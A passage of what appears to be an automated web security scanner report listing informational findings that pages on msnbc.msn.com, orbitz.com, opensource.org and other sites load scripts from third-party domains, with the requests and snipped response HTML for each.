18.783. http://www.msnbc.msn.com/id/41365053 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41365053

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=9445
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41365053 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.784. http://www.msnbc.msn.com/id/41365053/ns/weather/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41365053/ns/weather/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=9445
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41365053/ns/weather/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.785. http://www.msnbc.msn.com/id/41366134/ns/world_news-mideastn_africa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41366134/ns/world_news-mideastn_africa

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41366134/ns/world_news-mideastn_africa HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.786. http://www.msnbc.msn.com/id/41367374/ns/world_news-europe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41367374/ns/world_news-europe

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41367374/ns/world_news-europe HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.787. http://www.mygadgetsblog.info/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mygadgetsblog.info
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s9.addthis.com/js/widget.php?v=10
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A7uutgbcgpj4

Request

GET / HTTP/1.1
Host: www.mygadgetsblog.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:55 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.mygadgetsblog.info/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A7uutgbcgpj4"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.788. http://www.mywot.com/en/scorecard/2mdn.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mywot.com
Path:	/en/scorecard/2mdn.net

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /en/scorecard/2mdn.net HTTP/1.1
Host: www.mywot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.789. http://www.no-margin-for-errors.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.no-margin-for-errors.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=scaron&apiKey=R_6d2a7b26f3f521e79060a081e248770a

Request

GET / HTTP/1.1
Host: www.no-margin-for-errors.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 02 Feb 2011 16:04:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.6-2ubuntu4.5
X-Pingback: http://www.no-margin-for-errors.com/xmlrpc.php
Last-Modified: Thu, 01 Jan 1970 00:00:00 +0000
Vary: Accept-Encoding
Content-Length: 18157

<!DOCTYPE HTML>
<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

   <title> St..phane Caron ... No Margin For Errors</title>

   <meta name="google-site-verification
...[SNIP]...
</script>
   <script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=scaron&apiKey=R_6d2a7b26f3f521e79060a081e248770a"></script>
...[SNIP]...

18.790. http://www.nolanfans.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nolanfans.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://tcr.tynt.com/javascripts/Tracer.js?user=dkVhwmr3Sr35VgadbiUzgI&s=160

Request

GET / HTTP/1.1
Host: www.nolanfans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 03 Feb 2011 04:47:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Last-Modified: Thu, 03 Feb 2011 04:05:14 GMT
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.nolanfans.com/wordpress/xmlrpc.php
Cache-Control: max-age=0
Expires: Thu, 03 Feb 2011 04:47:47 GMT
Content-Length: 47195

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title>Nolan Fans</title>
   <meta name="description" content="NolanFans.com is the premiere fan community for and by fans of film dire
...[SNIP]...
<link rel="stylesheet" href="http://www.nolanfans.com/library/htmlmedia/build/mediaelementplayer.css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
       <script type="text/javascript"
       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
       </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=dkVhwmr3Sr35VgadbiUzgI&s=160"></script>
...[SNIP]...

18.791. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.792. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.793. http://www.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=265DA875C314B0C54855FC80AB1B1D8C; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Tue, 01 Feb 2011 15:22:26 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/
Content-Length: 175717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=60&width=468&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...

18.794. http://www.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=0F1600040E23F2D3AEADA88B6A976A79; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=0F1600040E23F2D3AEADA88B6A976A79|egapp57p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Tue, 01 Feb 2011 15:29:04 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3272845525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 175717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=60&width=468&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296574145622&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...

18.795. http://www.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=2&
